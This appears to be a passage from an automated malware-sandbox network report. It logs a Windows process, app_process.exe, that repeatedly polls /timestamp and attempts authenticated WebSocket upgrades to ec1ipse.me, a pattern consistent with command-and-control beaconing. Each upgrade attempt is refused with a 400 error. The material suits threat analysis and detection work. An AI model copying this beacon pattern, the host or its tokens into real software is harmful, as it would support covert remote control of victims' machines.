                                                                                                                                                        authorization: Basic N0tENVh4aXVUY2dlYnZ1WHlzcTNzRlhHUzRBMlVaVGtBTmtwanVaSkVQcm86NHNzd2k1aHROd3hCQzRkTTlYbnNteXdrOFY1Uk10S2czMzRtbm94Uzc4Rnp6WXo4TWdZc3RpeFZqYVlrZzJFbkx5d3NyYzZYQlYyUkRWSnJ0anN0QUhnVQ==
                                                                                                                                                        2024-11-25 10:11:28 UTC285INHTTP/1.1 400 Bad Request
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Mon, 25 Nov 2024 10:11:28 GMT
                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                        Content-Length: 44
                                                                                                                                                        Connection: close
                                                                                                                                                        vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                        2024-11-25 10:11:28 UTC44INData Raw: 60 55 70 67 72 61 64 65 60 20 68 65 61 64 65 72 20 64 69 64 20 6e 6f 74 20 69 6e 63 6c 75 64 65 20 27 77 65 62 73 6f 63 6b 65 74 27
                                                                                                                                                        Data Ascii: `Upgrade` header did not include 'websocket'


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        21192.168.2.549872172.233.211.124443356C:\Windows\System32\app_process.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-25 10:11:28 UTC374OUTGET /v2/ws?timestamp=1732529486 HTTP/1.1
                                                                                                                                                        Host: ec1ipse.me
                                                                                                                                                        Connection: upgrade
                                                                                                                                                        Upgrade: websocket
                                                                                                                                                        Sec-WebSocket-Version: 13
                                                                                                                                                        Sec-WebSocket-Key: nkGHFwCOnEgaFMiW/EcHhA==
                                                                                                                                                        authorization: Basic NEFDejdkZXhxYkFONzF6RDVXQU5aTEtEWVF1aHo4RDRqNnBka215S1E5MVE6WGZhUXUzdExuQTFuNTdONUFaemdFSEdwY3F1Q0RlVkJudldBc3NaQUIyNFdkaGozMWh5Y3Rod3oyeERrOENCNE44TlkxU0dqeVBxbkg1VHVRRDR2eEdw
                                                                                                                                                        2024-11-25 10:11:28 UTC285INHTTP/1.1 400 Bad Request
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Mon, 25 Nov 2024 10:11:28 GMT
                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                        Content-Length: 44
                                                                                                                                                        Connection: close
                                                                                                                                                        vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                        2024-11-25 10:11:28 UTC44INData Raw: 60 55 70 67 72 61 64 65 60 20 68 65 61 64 65 72 20 64 69 64 20 6e 6f 74 20 69 6e 63 6c 75 64 65 20 27 77 65 62 73 6f 63 6b 65 74 27
                                                                                                                                                        Data Ascii: `Upgrade` header did not include 'websocket'


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        22192.168.2.549884172.233.211.1244436444C:\Windows\System32\app_process.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-25 10:11:33 UTC58OUTGET /timestamp HTTP/1.1
                                                                                                                                                        accept: */*
                                                                                                                                                        host: ec1ipse.me
                                                                                                                                                        2024-11-25 10:11:33 UTC235INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Mon, 25 Nov 2024 10:11:33 GMT
                                                                                                                                                        Content-Length: 10
                                                                                                                                                        Connection: close
                                                                                                                                                        vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                        2024-11-25 10:11:33 UTC10INData Raw: 31 37 33 32 35 32 39 34 39 33
                                                                                                                                                        Data Ascii: 1732529493


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        23192.168.2.549886172.233.211.124443356C:\Windows\System32\app_process.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-25 10:11:33 UTC58OUTGET /timestamp HTTP/1.1
                                                                                                                                                        accept: */*
                                                                                                                                                        host: ec1ipse.me
                                                                                                                                                        2024-11-25 10:11:33 UTC235INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Mon, 25 Nov 2024 10:11:33 GMT
                                                                                                                                                        Content-Length: 10
                                                                                                                                                        Connection: close
                                                                                                                                                        vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                        2024-11-25 10:11:33 UTC10INData Raw: 31 37 33 32 35 32 39 34 39 33
                                                                                                                                                        Data Ascii: 1732529493


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        24192.168.2.549890172.233.211.1244436444C:\Windows\System32\app_process.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-25 10:11:34 UTC378OUTGET /v2/ws?timestamp=1732529493 HTTP/1.1
                                                                                                                                                        Host: ec1ipse.me
                                                                                                                                                        Connection: upgrade
                                                                                                                                                        Upgrade: websocket
                                                                                                                                                        Sec-WebSocket-Version: 13
                                                                                                                                                        Sec-WebSocket-Key: Jcg0jM88I6kJ8E206drpQg==
                                                                                                                                                        authorization: Basic N0tENVh4aXVUY2dlYnZ1WHlzcTNzRlhHUzRBMlVaVGtBTmtwanVaSkVQcm86NWpvR210UEtUMWtyOE1RQmlNWTl4UzQyNFpUZXRHZFlNQUprMkJ2Y0o1eTlITlRmVkJTZmV0Uk5aOTVkaFl3Zml0OWdlS3BMYkZBNmpuclExVHc2dEQ0Zg==
                                                                                                                                                        2024-11-25 10:11:36 UTC285INHTTP/1.1 400 Bad Request
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Mon, 25 Nov 2024 10:11:36 GMT
                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                        Content-Length: 44
                                                                                                                                                        Connection: close
                                                                                                                                                        vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                        2024-11-25 10:11:36 UTC44INData Raw: 60 55 70 67 72 61 64 65 60 20 68 65 61 64 65 72 20 64 69 64 20 6e 6f 74 20 69 6e 63 6c 75 64 65 20 27 77 65 62 73 6f 63 6b 65 74 27
                                                                                                                                                        Data Ascii: `Upgrade` header did not include 'websocket'


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        25192.168.2.549891172.233.211.124443356C:\Windows\System32\app_process.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-25 10:11:35 UTC374OUTGET /v2/ws?timestamp=1732529493 HTTP/1.1
                                                                                                                                                        Host: ec1ipse.me
                                                                                                                                                        Connection: upgrade
                                                                                                                                                        Upgrade: websocket
                                                                                                                                                        Sec-WebSocket-Version: 13
                                                                                                                                                        Sec-WebSocket-Key: fNEZjZj4duZrRnwSm600NQ==
                                                                                                                                                        authorization: Basic NEFDejdkZXhxYkFONzF6RDVXQU5aTEtEWVF1aHo4RDRqNnBka215S1E5MVE6NTVUU1k0NU00TW9RMVlWa29KSENmM2plcnloS0JSOHZpcHNpcmpld2RSaFJFcmdXNkNhWXVBOUJSeHpnNTFaUnBKZEY2clFKZUxzZ2tlbWZmcUhuVUhT
                                                                                                                                                        2024-11-25 10:11:36 UTC285INHTTP/1.1 400 Bad Request
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Mon, 25 Nov 2024 10:11:36 GMT
                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                        Content-Length: 44
                                                                                                                                                        Connection: close
                                                                                                                                                        vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                        2024-11-25 10:11:36 UTC44INData Raw: 60 55 70 67 72 61 64 65 60 20 68 65 61 64 65 72 20 64 69 64 20 6e 6f 74 20 69 6e 63 6c 75 64 65 20 27 77 65 62 73 6f 63 6b 65 74 27
                                                                                                                                                        Data Ascii: `Upgrade` header did not include 'websocket'


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        26192.168.2.549906172.233.211.124443356C:\Windows\System32\app_process.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-25 10:11:40 UTC58OUTGET /timestamp HTTP/1.1
                                                                                                                                                        accept: */*
                                                                                                                                                        host: ec1ipse.me
                                                                                                                                                        2024-11-25 10:11:41 UTC235INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Mon, 25 Nov 2024 10:11:40 GMT
                                                                                                                                                        Content-Length: 10
                                                                                                                                                        Connection: close
                                                                                                                                                        vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                        2024-11-25 10:11:41 UTC10INData Raw: 31 37 33 32 35 32 39 35 30 30
                                                                                                                                                        Data Ascii: 1732529500


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        27192.168.2.549908172.233.211.1244436444C:\Windows\System32\app_process.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-25 10:11:40 UTC58OUTGET /timestamp HTTP/1.1
                                                                                                                                                        accept: */*
                                                                                                                                                        host: ec1ipse.me
                                                                                                                                                        2024-11-25 10:11:41 UTC235INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Mon, 25 Nov 2024 10:11:41 GMT
                                                                                                                                                        Content-Length: 10
                                                                                                                                                        Connection: close
                                                                                                                                                        vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                        2024-11-25 10:11:41 UTC10INData Raw: 31 37 33 32 35 32 39 35 30 31
                                                                                                                                                        Data Ascii: 1732529501


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        28192.168.2.549912172.233.211.124443356C:\Windows\System32\app_process.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-25 10:11:42 UTC378OUTGET /v2/ws?timestamp=1732529500 HTTP/1.1
                                                                                                                                                        Host: ec1ipse.me
                                                                                                                                                        Connection: upgrade
                                                                                                                                                        Upgrade: websocket
                                                                                                                                                        Sec-WebSocket-Version: 13
                                                                                                                                                        Sec-WebSocket-Key: KngXupv80UoejMuFIlqepg==
                                                                                                                                                        authorization: Basic NEFDejdkZXhxYkFONzF6RDVXQU5aTEtEWVF1aHo4RDRqNnBka215S1E5MVE6M1VpaUhnWmpFQjdNNjRmOFlta1lhSkRwVUFRNXgyR25uckFCUFJNcEtZZVBURWRlQjZ3WVVDS0QyQlJiMk5zRGdmU0s5M1RnWGNyZVdDZzhwRHcyd0Z3VA==
                                                                                                                                                        2024-11-25 10:11:43 UTC285INHTTP/1.1 400 Bad Request
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Mon, 25 Nov 2024 10:11:43 GMT
                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                        Content-Length: 44
                                                                                                                                                        Connection: close
                                                                                                                                                        vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                        2024-11-25 10:11:43 UTC44INData Raw: 60 55 70 67 72 61 64 65 60 20 68 65 61 64 65 72 20 64 69 64 20 6e 6f 74 20 69 6e 63 6c 75 64 65 20 27 77 65 62 73 6f 63 6b 65 74 27
                                                                                                                                                        Data Ascii: `Upgrade` header did not include 'websocket'


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        29192.168.2.549913172.233.211.1244436444C:\Windows\System32\app_process.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-25 10:11:42 UTC374OUTGET /v2/ws?timestamp=1732529501 HTTP/1.1
                                                                                                                                                        Host: ec1ipse.me
                                                                                                                                                        Connection: upgrade
                                                                                                                                                        Upgrade: websocket
                                                                                                                                                        Sec-WebSocket-Version: 13
                                                                                                                                                        Sec-WebSocket-Key: j6vtTw5Bu3zHrdEAvVh3Dw==
                                                                                                                                                        authorization: Basic N0tENVh4aXVUY2dlYnZ1WHlzcTNzRlhHUzRBMlVaVGtBTmtwanVaSkVQcm86YkNpZnM4YTJGOGdiNXNSendkN1JyaTJiWE5MZlllcUhzV0FQTWFyczZWWEVyUlV2cE51a1BGQ0JRbTM4eHVkWFNkNTFWS010SHYzcjRuQ3JBdEN0N3Vj
                                                                                                                                                        2024-11-25 10:11:43 UTC285INHTTP/1.1 400 Bad Request
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Mon, 25 Nov 2024 10:11:43 GMT
                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                        Content-Length: 44
                                                                                                                                                        Connection: close
                                                                                                                                                        vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                        2024-11-25 10:11:43 UTC44INData Raw: 60 55 70 67 72 61 64 65 60 20 68 65 61 64 65 72 20 64 69 64 20 6e 6f 74 20 69 6e 63 6c 75 64 65 20 27 77 65 62 73 6f 63 6b 65 74 27
                                                                                                                                                        Data Ascii: `Upgrade` header did not include 'websocket'


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        30192.168.2.549926172.233.211.124443356C:\Windows\System32\app_process.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-25 10:11:48 UTC58OUTGET /timestamp HTTP/1.1
                                                                                                                                                        accept: */*
                                                                                                                                                        host: ec1ipse.me
                                                                                                                                                        2024-11-25 10:11:48 UTC235INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Mon, 25 Nov 2024 10:11:48 GMT
                                                                                                                                                        Content-Length: 10
                                                                                                                                                        Connection: close
                                                                                                                                                        vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                        2024-11-25 10:11:48 UTC10INData Raw: 31 37 33 32 35 32 39 35 30 38
                                                                                                                                                        Data Ascii: 1732529508


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        31192.168.2.549927172.233.211.1244436444C:\Windows\System32\app_process.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-25 10:11:48 UTC58OUTGET /timestamp HTTP/1.1
                                                                                                                                                        accept: */*
                                                                                                                                                        host: ec1ipse.me
                                                                                                                                                        2024-11-25 10:11:48 UTC235INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Mon, 25 Nov 2024 10:11:48 GMT
                                                                                                                                                        Content-Length: 10
                                                                                                                                                        Connection: close
                                                                                                                                                        vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                        2024-11-25 10:11:48 UTC10INData Raw: 31 37 33 32 35 32 39 35 30 38
                                                                                                                                                        Data Ascii: 1732529508


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        32192.168.2.549932172.233.211.124443356C:\Windows\System32\app_process.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-25 10:11:49 UTC378OUTGET /v2/ws?timestamp=1732529508 HTTP/1.1
                                                                                                                                                        Host: ec1ipse.me
                                                                                                                                                        Connection: upgrade
                                                                                                                                                        Upgrade: websocket
                                                                                                                                                        Sec-WebSocket-Version: 13
                                                                                                                                                        Sec-WebSocket-Key: qRN+NG4Nxs/4uirJDFZciQ==
                                                                                                                                                        authorization: Basic NEFDejdkZXhxYkFONzF6RDVXQU5aTEtEWVF1aHo4RDRqNnBka215S1E5MVE6NHhZZFBiODlRbmpOSDY4WHZKWjhCTmVSY1JNNGQxd2I0UjYybkZ0TXFoa1VKN0xuV1Bad00xUW9EaTVINEdMV1doMkZEUXNyamNTYkJZWFBIdmY1R3FNWg==
                                                                                                                                                        2024-11-25 10:11:50 UTC285INHTTP/1.1 400 Bad Request
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Mon, 25 Nov 2024 10:11:50 GMT
                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                        Content-Length: 44
                                                                                                                                                        Connection: close
                                                                                                                                                        vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                        2024-11-25 10:11:50 UTC44INData Raw: 60 55 70 67 72 61 64 65 60 20 68 65 61 64 65 72 20 64 69 64 20 6e 6f 74 20 69 6e 63 6c 75 64 65 20 27 77 65 62 73 6f 63 6b 65 74 27
                                                                                                                                                        Data Ascii: `Upgrade` header did not include 'websocket'


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        33192.168.2.549933172.233.211.1244436444C:\Windows\System32\app_process.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-25 10:11:49 UTC378OUTGET /v2/ws?timestamp=1732529508 HTTP/1.1
                                                                                                                                                        Host: ec1ipse.me
                                                                                                                                                        Connection: upgrade
                                                                                                                                                        Upgrade: websocket
                                                                                                                                                        Sec-WebSocket-Version: 13
                                                                                                                                                        Sec-WebSocket-Key: X8Pr2Hwo0w5JM2/K0j4UOQ==
                                                                                                                                                        authorization: Basic N0tENVh4aXVUY2dlYnZ1WHlzcTNzRlhHUzRBMlVaVGtBTmtwanVaSkVQcm86M3BuandoZUw2M1FEelliWmF6dENZQm1UUnV1cmJLUXpSdTc2djVCWWJtcjNUWW96MndVOG5XU3lkcHd2VUt2S0UyaHRCODJNRnVvTkFKU2JWcGpWdFJrbg==
                                                                                                                                                        2024-11-25 10:11:50 UTC285INHTTP/1.1 400 Bad Request
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Mon, 25 Nov 2024 10:11:50 GMT
                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                        Content-Length: 44
                                                                                                                                                        Connection: close
                                                                                                                                                        vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                        2024-11-25 10:11:50 UTC44INData Raw: 60 55 70 67 72 61 64 65 60 20 68 65 61 64 65 72 20 64 69 64 20 6e 6f 74 20 69 6e 63 6c 75 64 65 20 27 77 65 62 73 6f 63 6b 65 74 27
                                                                                                                                                        Data Ascii: `Upgrade` header did not include 'websocket'


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        34192.168.2.549943172.233.211.124443356C:\Windows\System32\app_process.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-25 10:11:54 UTC58OUTGET /timestamp HTTP/1.1
                                                                                                                                                        accept: */*
                                                                                                                                                        host: ec1ipse.me
                                                                                                                                                        2024-11-25 10:11:55 UTC235INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Mon, 25 Nov 2024 10:11:54 GMT
                                                                                                                                                        Content-Length: 10
                                                                                                                                                        Connection: close
                                                                                                                                                        vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                        2024-11-25 10:11:55 UTC10INData Raw: 31 37 33 32 35 32 39 35 31 34
                                                                                                                                                        Data Ascii: 1732529514


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        35192.168.2.549944172.233.211.1244436444C:\Windows\System32\app_process.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-25 10:11:54 UTC58OUTGET /timestamp HTTP/1.1
                                                                                                                                                        accept: */*
                                                                                                                                                        host: ec1ipse.me
                                                                                                                                                        2024-11-25 10:11:55 UTC235INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Mon, 25 Nov 2024 10:11:54 GMT
                                                                                                                                                        Content-Length: 10
                                                                                                                                                        Connection: close
                                                                                                                                                        vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                        2024-11-25 10:11:55 UTC10INData Raw: 31 37 33 32 35 32 39 35 31 34
                                                                                                                                                        Data Ascii: 1732529514


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        36192.168.2.549951172.233.211.1244436444C:\Windows\System32\app_process.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-25 10:11:56 UTC378OUTGET /v2/ws?timestamp=1732529514 HTTP/1.1
                                                                                                                                                        Host: ec1ipse.me
                                                                                                                                                        Connection: upgrade
                                                                                                                                                        Upgrade: websocket
                                                                                                                                                        Sec-WebSocket-Version: 13
                                                                                                                                                        Sec-WebSocket-Key: Ynt1PuqpG/6BQxTB/m8e8w==
                                                                                                                                                        authorization: Basic N0tENVh4aXVUY2dlYnZ1WHlzcTNzRlhHUzRBMlVaVGtBTmtwanVaSkVQcm86NHViVDhjVmF1NWREaDhwaDJDMmpHV0FKS0p0VGk5Sm9vekxybzRQdVZIOFFvUHJaeWNFODFZZWE1cnZhb3RKVVpKdzlCNEV2ckZGdzNOUXpIQ0NNdW11Rg==
                                                                                                                                                        2024-11-25 10:11:56 UTC285INHTTP/1.1 400 Bad Request
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Mon, 25 Nov 2024 10:11:56 GMT
                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                        Content-Length: 44
                                                                                                                                                        Connection: close
                                                                                                                                                        vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                        2024-11-25 10:11:56 UTC44INData Raw: 60 55 70 67 72 61 64 65 60 20 68 65 61 64 65 72 20 64 69 64 20 6e 6f 74 20 69 6e 63 6c 75 64 65 20 27 77 65 62 73 6f 63 6b 65 74 27
                                                                                                                                                        Data Ascii: `Upgrade` header did not include 'websocket'


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        37192.168.2.549950172.233.211.124443356C:\Windows\System32\app_process.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-25 10:11:56 UTC378OUTGET /v2/ws?timestamp=1732529514 HTTP/1.1
                                                                                                                                                        Host: ec1ipse.me
                                                                                                                                                        Connection: upgrade
                                                                                                                                                        Upgrade: websocket
                                                                                                                                                        Sec-WebSocket-Version: 13
                                                                                                                                                        Sec-WebSocket-Key: Njx82qrHiA3W9ov4hAzCKw==
                                                                                                                                                        authorization: Basic NEFDejdkZXhxYkFONzF6RDVXQU5aTEtEWVF1aHo4RDRqNnBka215S1E5MVE6NW1KWFBSRVR6YWdXaVFCOVVLakN4RVZnN3NBUllpbkdheG1RNUg1TUplY1g5aFg4TlhkV1JVd0NiMXdQZzJ5MUNtR3pTZEJUbkNqV3o1cGJwVGdlQW1TUQ==
                                                                                                                                                        2024-11-25 10:11:56 UTC285INHTTP/1.1 400 Bad Request
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Mon, 25 Nov 2024 10:11:56 GMT
                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                        Content-Length: 44
                                                                                                                                                        Connection: close
                                                                                                                                                        vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                        2024-11-25 10:11:56 UTC44INData Raw: 60 55 70 67 72 61 64 65 60 20 68 65 61 64 65 72 20 64 69 64 20 6e 6f 74 20 69 6e 63 6c 75 64 65 20 27 77 65 62 73 6f 63 6b 65 74 27
                                                                                                                                                        Data Ascii: `Upgrade` header did not include 'websocket'


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        38192.168.2.549963172.233.211.124443356C:\Windows\System32\app_process.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-25 10:12:01 UTC58OUTGET /timestamp HTTP/1.1
                                                                                                                                                        accept: */*
                                                                                                                                                        host: ec1ipse.me
                                                                                                                                                        2024-11-25 10:12:01 UTC235INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Mon, 25 Nov 2024 10:12:01 GMT
                                                                                                                                                        Content-Length: 10
                                                                                                                                                        Connection: close
                                                                                                                                                        vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                        2024-11-25 10:12:01 UTC10INData Raw: 31 37 33 32 35 32 39 35 32 31
                                                                                                                                                        Data Ascii: 1732529521


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        39192.168.2.549962172.233.211.1244436444C:\Windows\System32\app_process.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-25 10:12:01 UTC58OUTGET /timestamp HTTP/1.1
                                                                                                                                                        accept: */*
                                                                                                                                                        host: ec1ipse.me
                                                                                                                                                        2024-11-25 10:12:01 UTC235INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Mon, 25 Nov 2024 10:12:01 GMT
                                                                                                                                                        Content-Length: 10
                                                                                                                                                        Connection: close
                                                                                                                                                        vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                        2024-11-25 10:12:01 UTC10INData Raw: 31 37 33 32 35 32 39 35 32 31
                                                                                                                                                        Data Ascii: 1732529521


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        40192.168.2.549967172.233.211.124443356C:\Windows\System32\app_process.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-25 10:12:02 UTC378OUTGET /v2/ws?timestamp=1732529521 HTTP/1.1
                                                                                                                                                        Host: ec1ipse.me
                                                                                                                                                        Connection: upgrade
                                                                                                                                                        Upgrade: websocket
                                                                                                                                                        Sec-WebSocket-Version: 13
                                                                                                                                                        Sec-WebSocket-Key: 1GumYcukGPwro1eUNHrDMw==
                                                                                                                                                        authorization: Basic NEFDejdkZXhxYkFONzF6RDVXQU5aTEtEWVF1aHo4RDRqNnBka215S1E5MVE6MjZpaXdzUmF6Sm9oZmdMZHJ0UWZvR2IyekFCU1BhcER6V3pUNzlVVWY5RWF4YjV5TlJ5NnNMS3FkY21SUHV0UWJXbnVTNnlxSnBnWWFjelFUNEpRajNuZg==
                                                                                                                                                        2024-11-25 10:12:03 UTC285INHTTP/1.1 400 Bad Request
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Mon, 25 Nov 2024 10:12:03 GMT
                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                        Content-Length: 44
                                                                                                                                                        Connection: close
                                                                                                                                                        vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                        2024-11-25 10:12:03 UTC44INData Raw: 60 55 70 67 72 61 64 65 60 20 68 65 61 64 65 72 20 64 69 64 20 6e 6f 74 20 69 6e 63 6c 75 64 65 20 27 77 65 62 73 6f 63 6b 65 74 27
                                                                                                                                                        Data Ascii: `Upgrade` header did not include 'websocket'


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        41192.168.2.549969172.233.211.1244436444C:\Windows\System32\app_process.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-11-25 10:12:02 UTC378OUTGET /v2/ws?timestamp=1732529521 HTTP/1.1
                                                                                                                                                        Host: ec1ipse.me
                                                                                                                                                        Connection: upgrade
                                                                                                                                                        Upgrade: websocket
                                                                                                                                                        Sec-WebSocket-Version: 13
                                                                                                                                                        Sec-WebSocket-Key: qK3WihSrquxN35r2ZCS5Lw==
                                                                                                                                                        authorization: Basic N0tENVh4aXVUY2dlYnZ1WHlzcTNzRlhHUzRBMlVaVGtBTmtwanVaSkVQcm86M3BtanFTc1ljSk1CZEFaYnN5dkc3bUpYZVlFVW1ucGtkczlQanJtdzdTeFJmemRRWGRCcGJOM1M4OXBncXhBTmlreW9Ycm02YVlINDRndEo5Q3p1WDRkZA==
                                                                                                                                                        2024-11-25 10:12:03 UTC285INHTTP/1.1 400 Bad Request
                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                        Date: Mon, 25 Nov 2024 10:12:03 GMT
                                                                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                                                                        Content-Length: 44
                                                                                                                                                        Connection: close
                                                                                                                                                        vary: origin, access-control-request-method, access-control-request-headers
                                                                                                                                                        access-control-allow-origin: *
